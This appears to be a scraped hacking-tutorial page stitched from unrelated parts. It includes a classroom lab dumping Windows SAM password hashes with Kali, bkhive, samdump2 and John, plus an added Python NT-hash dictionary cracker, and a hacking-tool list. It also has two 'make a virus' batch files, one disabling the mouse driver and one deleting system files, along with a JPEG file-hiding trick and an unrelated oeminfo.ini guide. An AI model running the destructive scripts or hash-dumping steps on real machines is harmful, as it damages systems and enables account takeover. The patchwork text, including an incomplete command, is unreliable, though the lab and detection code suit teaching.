Password Cracking

{ Using Kali, bkhive, samdump2, and John to crack the SAM Database  }

Section 0. Background Information

What is the SAM Database?

    • The SAM database is the Security Account Manager database, used by Windows to manage local user accounts and their credentials. It is implemented as a registry hive file that is locked for exclusive use while the OS is running, which is why this lab boots a separate live OS to read it from disk.
  1. What is Kali?
    • Kali Linux is an advanced Penetration Testing and Security Auditing Linux distribution.
    • Kali is a complete rebuild of BackTrack Linux, adhering completely to Debian development standards, and includes the following features:
      • More than 300 penetration testing tools
      • Vast wireless device support
      • Custom kernel patched for injection
      • Secure development environment
  2. What is bkhive?
    • bkhive dumps the syskey bootkey from Windows NT/2K/XP/Vista system hive.
  3. What is samdump2?
    • samdump2 dumps the Windows NT/2K/XP/Vista password hashes.
  4. What is John the Ripper?
    • John the Ripper is a free password cracking software tool. Initially developed for the Unix operating system, it now runs on fifteen different platforms (eleven of which are architecture-specific versions of Unix, DOS, Win32, BeOS, and OpenVMS). It is one of the most popular password testing and breaking programs as it combines a number of password crackers into one package, autodetects password hash types, and includes a customizable cracker. It can be run against various hashed password formats including several crypt password hash types most commonly found on various Unix versions (based on DES, MD5, or Blowfish), Kerberos AFS, and Windows NT/2000/XP/2003 LM hashes. Additional modules have extended its ability to include MD4-based password hashes (the Windows NT hash) and passwords stored in LDAP, MySQL, and others.
  5. Lab Notes
    • In this lab we will do the following:
      1. We will boot the Windows virtual machine from the Kali live ISO.
      2. We will use Kali to mount the Windows Disk Partition that contains the SAM Database.
      3. We will use bkhive and samdump2 to extract password hashes for each user.
      4. We will use John the Ripper to crack the administrator password.
  6. Legal Disclaimer
    • As a condition of your use of this Web site, you warrant that you will not use this Web site for any purpose that is unlawful or that is prohibited by these terms, conditions, and notices.
    • In accordance with UCC § 2-316, this product is provided with “no warranties, either express or implied.” The information contained is provided “as-is”, with “no guarantee of merchantability.”
    • In addition, this is a teaching website that does not condone malicious behavior of any kind.
    • You are on notice that continuing and/or using this lab outside your “own” test environment is considered malicious and is against the law.
    • © 2013 No content replication of any kind is allowed without express written permission.
Section 1. Log into Damn Vulnerable WXP-SP2
  1. Start Up Damn Vulnerable WXP-SP2.
    • Instructions:
      1. Click on Damn Vulnerable WXP-SP2
      2. Click on Edit virtual machine Settings
    • Note(FYI):
      • For those of you not part of my class, this is a Windows XP machine running SP2.
  2. Edit Virtual Machine Settings
    • Instructions:
      1. Click on Network Adapter
      2. Click on the Bridged Radio button
      3. Click on the OK Button
  3. Play Virtual Machine
    • Instructions:
      1. Click on Damn Vulnerable WXP-SP2
      2. Click on Play virtual machine
  4. Logging into Damn Vulnerable WXP-SP2.
    • Instructions:
      1. Username: administrator
      2. Password: Use the Class Password or whatever you set it.
      3. Click the OK Button
Section 2. Change Administrator Password
  1. Open a Command Prompt
    • Instructions:
      1. Start –> All Programs –> Accessories –> Command Prompt
  2. Change the Administrator Password
    • Instructions:
      1. net user administrator football
    • Note(FYI):
      1. We are changing the password to something that is in the dictionary to show you how easily it can be cracked.
  3. Shutdown Windows Machine
    • Instructions:
      1. shutdown -s -t 0
    • Note(FYI):
      1. shutdown -s, shutdown the machine.
      2. -t 0, give the user a grace period of 0 seconds.  The default is 30 seconds.
Section 3. Configure Windows to boot from Kali
  1. Start Up Damn Vulnerable WXP-SP2.
    • Instructions:
      1. Click on Damn Vulnerable WXP-SP2
      2. Click on Edit virtual machine Settings
    • Note(FYI):
      • For those of you not part of my class, this is a Windows XP machine running SP2.
  2. Edit Virtual Machine Settings
    • Instructions:
      1. Click on CD/DVD(IDE)
      2. Check the Connect at power on checkbox
      3. Click on the Use ISO Image File: radio button
      4. Click the Browse Button and Navigate to Kali.iso location
      5. Select the Kali.iso
      6. Click on the OK Button
Section 4. Power on Virtual Machine and Obtain Boot Menu
  1. Play Virtual Machine
    • Instructions:
      1. Click on Damn Vulnerable WXP-SP2
      2. Click on Play virtual machine
  2. Obtain Boot Menu
    • Instructions
      1. Once you see the below vmware screen, (1) Left Click in the screen and (2) press the “<Esc>” key
    • Note(FYI):
      1. This might take you a few times so be patient!!!
  3. Boot Menu Options
    • Instructions:
      1. Arrow Down to CD-ROM Drive
      2. Press <Enter>
Section 5. Mount Windows Disk Partition with Kali
  1. Kali Linux Boot Menu
    • Instructions:
      1. Arrow Down to Live (686-pae)
      2. Press <Enter>
    • Note(FYI):
      1. Note this will usually be the first selection.
  2. Open a Terminal Window
    • Instructions:
      1. Click on the Terminal Window Icon
  3. View and Mount Windows Disk
    • Instructions:
      1. fdisk -l
        • Where “-l” is the lower case letter L.
      2. mount -t ntfs /dev/sda1 /mnt
    • Note(FYI):
      1. The fdisk command shows the partition table for one or more disks. Use it to confirm which device holds the Windows system partition before mounting; on this VM it is /dev/sda1.
      2. The mount command mounts a file system. Since this is a Windows file system, the “-t ntfs” option is specified (current Kali releases use the ntfs-3g driver for this). On a real engagement or forensic acquisition, add “-o ro” so the evidence disk is mounted read-only and nothing on it is modified.
  4. View Mount Point
    • Instructions:
      1. df -k
    • Note(FYI):
      1. The df command reports on file system disk space usage.
      2. Arrow #1 points to the Windows disk (/dev/sda1).
      3. Arrow #2 is the /mnt mount point that the Windows disk is now mounted on.
  5. View Windows Disk Contents
    • Instructions:
      1. cd /mnt
      2. ls
      3. cd WINDOWS/system32/config
    • Note(FYI):
      1. Since we mounted the Windows boot partition (/dev/sda1) on top of the /mnt directory, we have to cd into it to see its contents.
      2. The ls command will list the directories contents.
      3. This is where the SAM database lives. The SAM hive holds the LM and NT password hashes of the local accounts (not the passwords themselves), encrypted with a boot key that is stored in the system hive, which is why both files are needed in the next section.
Section 6. Using bkhive and samdump2
  1. Using bkhive and samdump2
    • Instructions:
      1. ls
      2. bkhive system /root/hive.txt
      3. samdump2 SAM /root/hive.txt > /root/hash.txt
    • Note(FYI):
      1. List the contents of the WINDOWS/system32/config directory; the two files needed are system and SAM.
      2. bkhive extracts the syskey boot key from the system hive and writes it to /root/hive.txt.
      3. samdump2 uses that boot key to decrypt the hashes in the SAM hive and prints them in pwdump format (user:RID:LM hash:NT hash:::), which is redirected into /root/hash.txt.
      4. Current Kali releases no longer ship bkhive; samdump2 3.x reads the system hive itself, so the two steps become a single command: samdump2 system SAM > /root/hash.txt
  2. View Hash Contents
    • Instructions:
      1. cd /root
      2. ls -l *.txt
      3. file *.txt
      4. cat hash.txt
    • Note(FYI):
      1. Change directory into /root, because that is where we put our hive and hash files.
      2. List out the files using a wildcard (*).
      3. Determine the file type of the hash and hive files: the hash file is ASCII text, while the hive file (the extracted boot key) is raw binary data.
      4. View the contents of the hash file
Section 7. Using John the Ripper
  1. Run John the Ripper
    • Instructions:
      1. john /root/hash.txt -format=nt2 -users=Administrator
      2. cd /root/.john
      3. ls -l
      4. cat john.pot
    • Note(FYI):
      1. John is a password cracking tool. With no mode given it runs single-crack mode, then its bundled wordlist (password.lst, which includes common words such as football), then incremental brute force.
      2. -format=nt2 is the NT hash format name used by the John jumbo build shipped with Kali at the time. In current John versions the format is NT (--format=NT), and --format=LM attacks the LM half of each line if one was stored. Running both is worthwhile: an LM hash gives the password case-insensitively in two 7-character halves and falls very quickly.
      3. After john has run, it stores the results in the .john directory under the current user’s home directory (e.g., /root/.john).
      4. Use “ls -l” to show the detailed listing of the files.
      5. View the contents of the john.pot file, which contains the cracked passwords.
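The two commands above form a pipeline: samdump2 emits one pwdump-format line per account, and John hashes dictionary words exactly the way Windows does until one matches. The following Python script is an added example (it is not part of the original lab, and it is not John’s or samdump2’s code) that reproduces the NT half of that pipeline end to end: a from-scratch MD4, the NT hash (MD4 over the UTF-16LE password), a pwdump parser, a dictionary attack, and the two audit findings an assessor reports from a SAM dump (LM hashes still stored, accounts with an empty password). The sample dump and wordlist are constructed for the example; the Administrator line carries the NT hash of “password” rather than the lab’s “football”.

```python
"""Added example (not from the lab, not John's or samdump2's code): the NT
half of the samdump2 -> John pipeline in pure Python.

samdump2 prints pwdump lines, user:RID:LMHASH:NTHASH:::, and the NT hash is
MD4 over the UTF-16LE encoding of the password. MD4 is implemented here
because OpenSSL 3 moved it to the legacy provider, so hashlib.new("md4")
raises on many current systems.
"""
import struct

MASK32 = 0xFFFFFFFF
# Value Windows stores when no LM hash is kept (LM disabled or password
# longer than 14 characters), and the NT hash of the empty password.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"
_R3_ORDER = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)


def _rotl(x, s):
    return ((x << s) | (x >> (32 - s))) & MASK32


def md4(data: bytes) -> str:
    """RFC 1320 MD4 digest of data as lowercase hex."""
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    # Pad: 0x80, zeros up to 56 mod 64, then the bit length as 64-bit LE.
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", (len(data) * 8) & 0xFFFFFFFFFFFFFFFF)
    f = lambda x, y, z: (x & y) | (~x & z)          # round 1 function
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)  # round 2 function
    h = lambda x, y, z: x ^ y ^ z                    # round 3 function
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for i in range(16):  # round 1, X index 0..15 in order
            a = _rotl((a + f(b, c, d) + X[i]) & MASK32, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 2, X index 0,4,8,12,1,5,9,13,...
            k = (i % 4) * 4 + i // 4
            a = _rotl((a + g(b, c, d) + X[k] + 0x5A827999) & MASK32, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 3, bit-reversed X index order
            a = _rotl((a + h(b, c, d) + X[_R3_ORDER[i]] + 0x6ED9EBA1) & MASK32, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        a, b, c, d = (a + aa) & MASK32, (b + bb) & MASK32, (c + cc) & MASK32, (d + dd) & MASK32
    return struct.pack("<4I", a, b, c, d).hex()


def nt_hash(password: str) -> str:
    """NT hash as stored in the SAM: MD4(UTF-16LE(password)), unsalted."""
    return md4(password.encode("utf-16-le"))


def parse_pwdump(text: str):
    """Parse samdump2/pwdump output into (user, rid, lm, nt) tuples."""
    entries = []
    for line in text.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            continue
        entries.append((parts[0], int(parts[1]), parts[2].lower(), parts[3].lower()))
    return entries


def crack_pwdump(text: str, wordlist) -> dict:
    """Dictionary attack on the NT field: {user: password or None}.

    Each candidate is hashed once and looked up against every account;
    that is what makes unsalted NT hashes cheap to attack in bulk.
    """
    table = {nt_hash(w): w for w in wordlist}
    return {user: table.get(nt) for user, _rid, _lm, nt in parse_pwdump(text)}


def audit_pwdump(text: str) -> list:
    """Findings worth reporting before anything is cracked."""
    findings = []
    for user, _rid, lm, nt in parse_pwdump(text):
        if nt == EMPTY_NT:
            findings.append((user, "empty password"))
        if lm != EMPTY_LM:
            findings.append((user, "LM hash stored: case-insensitive, two 7-char halves"))
    return findings


# Constructed sample in samdump2's format (not the lab VM's real dump).
# Administrator carries the NT hash of "password"; Guest has an empty password.
SAMPLE_PWDUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
"""
# Constructed stand-in for John's bundled password.lst.
WORDLIST = ["123456", "football", "password", "letmein"]

if __name__ == "__main__":
    for user, pw in crack_pwdump(SAMPLE_PWDUMP, WORDLIST).items():
        print(f"{user}: {pw!r}")
    for user, finding in audit_pwdump(SAMPLE_PWDUMP):
        print(f"finding: {user}: {finding}")
```

Run it as-is to see the Administrator password recovered and the Guest finding reported. To use it on the lab output, read /root/hash.txt into SAMPLE_PWDUMP and load a real wordlist into WORDLIST. It attacks only the NT field; a stored LM hash needs the DES-based LM algorithm, which John handles with --format=LM.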
Section 8. Proof of Lab
  1. Proof of Lab
    • Instructions:
      1. cd /root/.john
      2. ls -l
      3. cat john.pot
      4. date
      5. echo “Your Name”
        • This should be your actual name.
        • e.g., echo “John Gray”
    • Proof of Lab Instructions:
      1. Do a PrtScn
      2. Paste into a Word document
      3. Upload to Moodle.
Section 9. Post Installation Instructions
  1. Un-Mount and Poweroff the Virtual Machine
    • Instructions:
      1. cd
      2. umount /mnt
      3. poweroff
  2. Remove Disc Message
    • Instructions:
      1. Press Enter
  3. Edit Damn Vulnerable WXP-SP2.
    • Instructions:
      1. Click on Damn Vulnerable WXP-SP2
      2. Click on Edit virtual machine Settings
    • Note(FYI):
      • For those of you not part of my class, this is a Windows XP machine running SP2.
  4. Edit Virtual Machine Settings
    • Instructions:
      1. Click on CD/DVD(IDE)
      2. Click on the Use physical drive: radio button
      3. Select Auto detect from the drop-down menu
      4. Click on the OK Button

Hacking Software

1. Nmap – The Network Mapper

Nmap is one of the most widely used open source network mapping utilities. It scans for open ports, detects operating systems and the services running on them, and is also used for managing networks. Nmap is available for Windows as well as Linux, but it was originally designed for Linux/Unix, where it works best.

Learn More about Nmap

Download Nmap

2. John The Ripper Password Cracker

John the Ripper is a fast password cracker, available for many flavors of Unix, DOS, Win32, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. Besides several crypt(3) password hash types most commonly found on various Unix flavors, it supports Kerberos AFS and Windows NT/2000/XP/2003 LM hashes out of the box, plus several more with contributed patches. It is also well known as JtR.

Learn More About John The Ripper

Download John The Ripper

3. Nessus Remote Security Scanner

Nessus is a vulnerability scanner used by many well-known organizations for their security audits. Nessus was open source in the past but is now closed source, although a free edition is still available; it scans for thousands of general and critical vulnerabilities across a network.

Learn More About Nessus

Download Nessus

4. Wireshark – The Sniffer

It was formerly known as Ethereal. It is a network protocol analyzer, or sniffer, that lets you capture and interactively browse the contents of network frames. Being open source has let it grow in every direction, and it matches or exceeds the quality of the commercial network analyzers on the market.

It has a GUI and works well on both Linux and Windows.

Learn More About Wireshark

Download Wireshark

5. Eraser

Eraser is an advanced security tool for Windows that completely removes sensitive data from your hard drive by overwriting it several times with carefully selected patterns. Eraser is free software; its source code is released under the GNU General Public License. It works with all versions of Windows: 95, 98, ME, NT, 2000, XP, and DOS. It is a useful tool for securely deleting sensitive files, as opposed to merely hiding them.

Learn More About Eraser

Download Eraser

6. LCP – Windows Password Cracker

LCP is a well-known free tool for cracking Windows passwords on Windows NT/2000/XP/2003. It can import account information, recover passwords, distribute brute-force sessions, and compute hashes. It is similar to L0phtCrack.

It has several modes: brute force, dictionary attack, and hybrid attack.

Learn More About LCP

Download LCP

7. Cain & Abel Password Cracker

Cain & Abel is another password cracker for Windows-based systems. It collects passwords by sniffing the network, cracks hashed passwords using dictionary, brute-force and cryptanalysis attacks, records VoIP conversations, decodes scrambled passwords, uncovers cached passwords, reveals password boxes, and analyzes routing protocols.

The interesting part is that it does the sniffing itself, so you don’t have to hunt for password files of any kind.

Learn More About Cain & Able

Download Cain & Able

8. SuperScan – Port Scanner

SuperScan is a TCP/IP port scanner widely used for detecting open ports or live hosts in a given IP range. It has a GUI, is made for Windows, and is easy to use. Don’t miss it.

Learn More About Superscan

Download Superscan

9. Nikto – CGI Scanner

Nikto is an open source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 3200 potentially dangerous files/CGIs, versions of over 625 servers, and version-specific problems on over 230 servers.

Learn More About Nikto

Download Nikto

10. p0f

p0f is a passive OS fingerprinting tool: instead of sending probes, it identifies the operating system of machines whose communications you can observe.

p0f can fingerprint in several modes:

– SYN mode
– SYN+ACK mode
– RST+ mode

It simply listens to whatever traffic it sees in order to detect the OS.

remote administration tool in C language

Make a virus that disables the mouse

This batch file is harmful: it disables the mouse on the machine it runs on. Think before trying it on yourself.

  • Open Notepad and copy the lines below

rem ---------------------------------
rem Disable Mouse
rem Mouclass is the mouse class driver service. Deleting its key and
rem recreating it with Start=4 (SERVICE_DISABLED) stops it loading at boot.
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
rem reg delete prompts for confirmation unless /f is given
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ---------------------------------

  • Save this file as virus.bat
  • Done, you have just created your “virus”. Writing under HKEY_LOCAL_MACHINE needs administrative rights, and the effect appears at the next reboot, when the driver is no longer loaded.

Make a Simple Virus

Please don’t try this on your own PC.

It is a simple .bat file:

@echo off
rem Delete a few files the system relies on
@if exist c:\windows\system32\mouse del c:\windows\system32\mouse
@if exist c:\windows\system32\keyboard del c:\windows\system32\keyboard
rem the next line is incomplete as given on the original page
copy C:\windows\
@if exist c:\windows\system32\logoff.exe del c:\windows\system32\logoff.exe
rem paths containing spaces must be quoted, or "if exist" and "del" see two arguments
@if exist "C:\program files\internet explorer\iexplore.exe" del "C:\program files\internet explorer\iexplore.exe"

Copy these lines into Notepad and save the file as “rinse.bat” (renaming a text file to .exe does not make it an executable).

Only run this inside your own test environment: it deletes files the system needs.

How to hide files in JPEG pictures

If you’re looking to hide files on your PC’s hard drive, you may have read about ways to encrypt folders or change the attributes on a file so that they cannot be accessed by prying eyes. However, hiding files or folders that way often requires installing some sort of software on your computer, which could then be spotted by someone else.

I’ve written quite a few articles before on how you can hide files and folders in Windows XP and Vista, but here I’m going to show you a way to hide files that is very counter-intuitive and therefore easy to overlook: using a simple trick in Windows, you can hide a file inside a JPG picture file! Keep in mind what this is and isn’t: the files are not encrypted or protected in any way, just appended to the picture, so anyone who knows to open the image in an archiver sees them immediately. It hides them from a casual look, nothing more.

You can hide any type of file inside an image file this way, including txt, exe, mp3, avi, or whatever else. Not only that, you can store many files inside a single JPG file, not just one! This can come in very handy if you need to hide files from casual browsing and don’t want to bother with encryption and all that other technical stuff.

Hide File in Picture

In order to accomplish this task, you will need to have either WinZip or WinRAR installed on your computer. You can download either of these two off the Internet and use them without having to pay anything. Here are the steps for creating your hidden stash:

  • Create a folder on your hard drive, i.e. C:\Test and put in all of the files that you want to hide into that folder. Also, place the image that you will be using to hide the files in.


  • Now select all of the files that you want to hide, right-click on them, and choose the option to add them to a compressed ZIP or RAR file. Only select the files you want to hide, not the picture. Name it whatever you want, i.e. “Hidden.rar”.


  • Now you should have a folder that looks something like this with files, a JPG image, and a compressed archive:

[Screenshot: the folder containing the files, the JPG image, and Hidden.rar]

  • Now here’s the fun part! Click on Start, and then click on Run. Type in “CMD” without the quotes and press Enter. You should now see the command prompt window open. Type in “CD \” to get to the root directory. Then type CD and the directory name that you created, i.e. “CD Test“.


  • Now type in the following line: “copy /b DSC06578.JPG + Hidden.rar DSC06578.jpg” and press Enter. Do not use the quotes. You should get a response like below:

[Screenshot: output of the copy /b command]

Just make sure that you check the file extension on the compressed file, whether it is .ZIP or .RAR as you have to type out the entire file name with extension in the command. I have heard that some people say that they have had problems doing this with a .ZIP extension, so if that doesn’t work, make sure to compress to a .RAR file.

And that’s it! The picture file now has the compressed archive appended to it. It still opens as a picture because JPEG viewers stop reading at the End Of Image marker, and WinRAR or WinZip still open it because they look for their own archive structures (a ZIP reader locates the end-of-central-directory record from the end of the file) and ignore the image bytes in front. You can check the file size of the picture and see that it has increased by exactly the size of the archive.

You can access your hidden file in two ways. Firstly, simply change the extension to .RAR and open the file using WinRAR. Secondly, you can just right-click on the JPG image and choose Open With and then scroll down to WinRAR. Either way, you’ll see your hidden files show up that you can then extract out.


That’s it! That is all it takes to hide files inside JPG picture files. It works simply because not many people know it’s possible, and no one thinks of a picture as being able to “hide” files. Enjoy!
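Why the copy /b trick works, and why it is just as easy to spot, shown as an added Python example (this is not part of the original article, which uses WinRAR and the command prompt): the script walks the JPEG marker structure to find the real End Of Image marker, appends a ZIP the way copy /b does, then detects and carves the appended archive. The JPEG bytes and the ZIP are constructed inline; the JPEG is a minimal marker skeleton, not a viewable picture.

```python
"""Added example (Python, not from the original article): why the copy /b
trick works and how to detect it.

A JPEG decoder stops at the End Of Image marker (FF D9). An archiver looks
for its own structures instead: RAR for the "Rar!\x1a\x07" signature, ZIP
for the end-of-central-directory record at the end of the file. Bytes
appended after EOI are therefore invisible to the viewer and complete for
the archiver, and anything after a well-formed JPEG's EOI is foreign data.
"""
import io
import struct
import zipfile

# Markers that carry no length field: TEM, SOI and the restart markers.
_STANDALONE = {0x01, 0xD8} | set(range(0xD0, 0xD8))
SIGNATURES = {b"PK\x03\x04": "zip", b"Rar!\x1a\x07": "rar"}


def jpeg_end(data: bytes) -> int:
    """Offset just past the EOI marker of the JPEG at the start of data.

    Walks segments by their length fields and, inside scan data (after SOS),
    skips byte-stuffed FF 00 and restart markers, so the EOI of an EXIF
    thumbnail inside an APP1 segment is never mistaken for the real one.
    """
    if data[:2] != b"\xff\xd8":
        raise ValueError("missing SOI marker")
    pos = 2
    while pos + 2 <= len(data):
        if data[pos] != 0xFF:
            raise ValueError(f"expected marker at offset {pos}")
        while data[pos + 1] == 0xFF and pos + 2 < len(data):  # FF fill bytes
            pos += 1
        marker = data[pos + 1]
        pos += 2
        if marker == 0xD9:  # EOI
            return pos
        if marker in _STANDALONE:
            continue
        if pos + 2 > len(data):
            break
        (seglen,) = struct.unpack(">H", data[pos:pos + 2])
        pos += seglen  # the length field counts its own two bytes
        if marker == 0xDA:  # SOS: entropy-coded data follows until a real marker
            while pos + 1 < len(data):
                nxt = data[pos + 1]
                if data[pos] == 0xFF and nxt != 0x00 and not 0xD0 <= nxt <= 0xD7:
                    break
                pos += 1
    raise ValueError("no EOI marker found")


def append_archive(jpeg: bytes, archive: bytes) -> bytes:
    """Equivalent of: copy /b picture.jpg + Hidden.rar picture.jpg"""
    return jpeg + archive


def find_trailer(data: bytes):
    """(offset, kind) of data appended after the JPEG, or (None, None).

    kind is "zip", "rar" or "unknown" when trailing bytes exist.
    """
    end = jpeg_end(data)
    if end >= len(data):
        return None, None
    for sig, kind in SIGNATURES.items():
        if data.startswith(sig, end):
            return end, kind
    return end, "unknown"


def extract_zip_trailer(data: bytes) -> dict:
    """Carve the appended ZIP and return {name: content}."""
    offset, kind = find_trailer(data)
    if kind != "zip":
        raise ValueError("no ZIP trailer")
    with zipfile.ZipFile(io.BytesIO(data[offset:])) as zf:
        return {name: zf.read(name) for name in zf.namelist()}


def open_polyglot_names(data: bytes) -> list:
    """Open the whole polyglot as a ZIP, as WinRAR does via 'Open With': the
    archive is located from its end-of-central-directory record, not offset 0."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return zf.namelist()


def make_sample():
    """Constructed inputs: a minimal JPEG marker skeleton (not a viewable
    picture) and a small ZIP, both built in memory."""
    jpeg = (b"\xff\xd8"                                   # SOI
            + b"\xff\xe0" + struct.pack(">H", 16)          # APP0 / JFIF header
            + b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
            + b"\xff\xda" + struct.pack(">H", 8)           # SOS, one component
            + b"\x01\x01\x00\x00\x3f\x00"
            + b"\x12\x34\xff\x00\x56\x78"                  # scan data with a stuffed FF 00
            + b"\xff\xd9")                                 # EOI
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("secret.txt", "the hidden payload")
    return jpeg, buf.getvalue()


if __name__ == "__main__":
    jpeg, archive = make_sample()
    polyglot = append_archive(jpeg, archive)
    print(find_trailer(jpeg), find_trailer(polyglot))
    print(extract_zip_trailer(polyglot))
    print(open_polyglot_names(polyglot))
```

The detection side is the practitioner’s takeaway: a scanner that checks for bytes after the EOI marker flags every file made this way, and the signature check tells it what was appended. Renaming to .rar, as the article suggests, is only needed because Windows picks the opener by extension.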

Windows XP System Properties – General Tab

To open System Properties, click Start and then Control Panel. From the Control Panel, double click System. Another way to bring up this box is to right click My Computer on your desktop and select Properties from the menu. A keyboard shortcut is to hold down the Windows Logo key in the bottom left of your keyboard and, keeping it held down, press the Pause/Break key. You should see something like the following:

[Screenshot: System Properties dialog, General tab]

The first tab of the System Properties box, General, shows you information about your version of Windows. As you can see, this computer is running XP with Service Pack 2 installed. The area at the bottom is just additional information. For the more adventurous amongst you, you can change the logo and text below to something of your own. The part you’ll be changing is this part:

[Screenshot: the manufacturer logo and support information area of the General tab]

Here’s how.

Navigate to this folder on your hard drive:

C:\WINDOWS\SYSTEM32

Look for a file called oeminfo.ini. Double click it, and it should open in Notepad. Here’s what ours looks like:

[general]
Manufacturer = Home and Learn
Model = Self-Built
[Support Information]
Line1 = Phone: 01642 868839
Line2 = Email:

Your file needs to be laid out like the one above. Leave the parts in square brackets, [general] and [Support Information], as they are, and change only what comes after the equals sign ( = ). Put your own text in place of the values shown above.

You don’t need any Support Information. But if you only have Line1, the Support Information button will be unavailable. If you add a Line2, you’ll be able to click the button and see the rest of the text you typed.

To change the image to one of your own, you need an image that is no larger than this:

width = 180 pixels
height = 114 pixels

You can create your own in something like Photoshop or Paint Shop Pro (or even Paint). Then save your work as a BITMAP file (.bmp). But you need to save your work with the following name:

oemlogo.bmp
Once you’re happy with your new logo, copy and paste it to the folder you opened above (C:\WINDOWS\SYSTEM32). Launch the System Properties box again to view your work.

Here’s another General tab logo we created:

[Screenshot: a custom General tab logo]

The image was created using a Tube in Paint Shop Pro. Very easy to do! If you’d like to practice with some Bitmap images we created, then download the images below. Change the name of an image to oemlogo.bmp before you copy and paste it to your SYSTEM32 folder.
